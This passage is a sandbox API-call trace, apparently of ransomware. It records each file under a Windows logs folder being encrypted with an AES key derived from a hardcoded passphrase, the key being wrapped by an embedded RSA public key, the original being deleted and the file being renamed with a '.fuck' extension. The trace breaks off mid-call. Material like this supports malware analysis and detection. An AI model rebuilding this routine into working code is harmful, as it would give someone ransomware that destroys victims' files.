KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.380] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.380] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3d90) returned 1 [0241.381] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3d90, dwCertEncodingType=0x1, pInfo=0x29065f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906628*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906630*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e8138) returned 1 [0241.381] CryptEncrypt (in: hKey=0x28e8138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.381] CryptEncrypt (in: hKey=0x28e8138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2da0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f2da0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.381] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f2da0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f2da0*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.382] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.382] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.382] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.383] CloseHandle (hObject=0xffffffff) returned 1 [0241.383] CloseHandle (hObject=0x5d10) returned 1 [0241.391] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl"), bFailIfExists=0) returned 0 [0241.399] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl", dwFileAttributes=0x2000) returned 0 [0241.399] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl.gsg")) returned 1 [0241.401] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.013.etl.fuck")) returned 0 [0241.401] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.401] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.401] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.401] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.401] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.401] GetLastError () returned 0x5 [0241.402] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl")) returned 0x2020 [0241.402] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl", dwFileAttributes=0x80) returned 0 [0241.402] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.402] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.403] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.404] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.406] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.406] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.406] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.406] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.406] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.406] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.406] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3a60) returned 1 [0241.407] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3a60, dwCertEncodingType=0x1, pInfo=0x29066c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29066f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906700*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7eb8) returned 1 [0241.407] CryptEncrypt (in: hKey=0x28e7eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.407] CryptEncrypt (in: hKey=0x28e7eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2e28*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f2e28*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.407] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f2e28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e28*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.408] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.408] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.408] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.408] CloseHandle (hObject=0xffffffff) returned 1 [0241.408] CloseHandle (hObject=0x5d10) returned 1 [0241.411] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl"), bFailIfExists=0) returned 0 [0241.418] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl", dwFileAttributes=0x2000) returned 0 [0241.419] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl.gsg")) returned 1 [0241.420] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.014.etl.fuck")) returned 0 [0241.421] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.421] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.421] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.421] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.421] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.421] GetLastError () returned 0x5 [0241.421] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl")) returned 0x2020 [0241.421] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl", dwFileAttributes=0x80) returned 0 [0241.422] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.422] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.422] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.423] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.425] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.425] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.425] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.425] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.425] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.425] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.425] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f2eb0) returned 1 [0241.426] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2eb0, dwCertEncodingType=0x1, pInfo=0x2906798*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29067c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29067d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7cb8) returned 1 [0241.426] CryptEncrypt (in: hKey=0x28e7cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.426] CryptEncrypt (in: hKey=0x28e7cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4940*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f4940*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.426] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f4940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f4940*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.427] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.427] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.427] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.427] CloseHandle (hObject=0xffffffff) returned 1 [0241.427] CloseHandle (hObject=0x5d10) returned 1 [0241.433] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl"), bFailIfExists=0) returned 0 [0241.442] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl", dwFileAttributes=0x2000) returned 0 [0241.443] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl.gsg")) returned 1 [0241.445] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.015.etl.fuck")) returned 0 [0241.445] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.445] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.446] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.446] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.446] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.446] GetLastError () returned 0x5 [0241.446] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl")) returned 0x2020 [0241.446] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl", dwFileAttributes=0x80) returned 0 [0241.446] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.447] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.447] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.448] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.450] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.450] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.450] CryptHashData (hHash=0x28e8578, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.450] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.451] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.451] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.451] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f4038) returned 1 [0241.451] CryptImportPublicKeyInfo (in: hCryptProv=0x28f4038, dwCertEncodingType=0x1, pInfo=0x2906c78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906ca8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906cb0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7cf8) returned 1 [0241.451] CryptEncrypt (in: hKey=0x28e7cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.451] CryptEncrypt (in: hKey=0x28e7cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f4e08*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f4e08*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.452] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f4e08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f4e08*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.452] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.452] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.453] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.453] CloseHandle (hObject=0xffffffff) returned 1 [0241.453] CloseHandle (hObject=0x5d10) returned 1 [0241.456] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl"), bFailIfExists=0) returned 0 [0241.465] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl", dwFileAttributes=0x2000) returned 0 [0241.467] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl.gsg")) returned 1 [0241.469] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl"), lpNewFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.016.etl.fuck" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.016.etl.fuck")) returned 0 [0241.471] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.471] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.471] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.471] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.471] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.481] GetLastError () returned 0x5 [0241.481] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.017.etl")) returned 0x2020 [0241.482] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl", dwFileAttributes=0x80) returned 0 [0241.483] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.017.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.484] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.017.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, 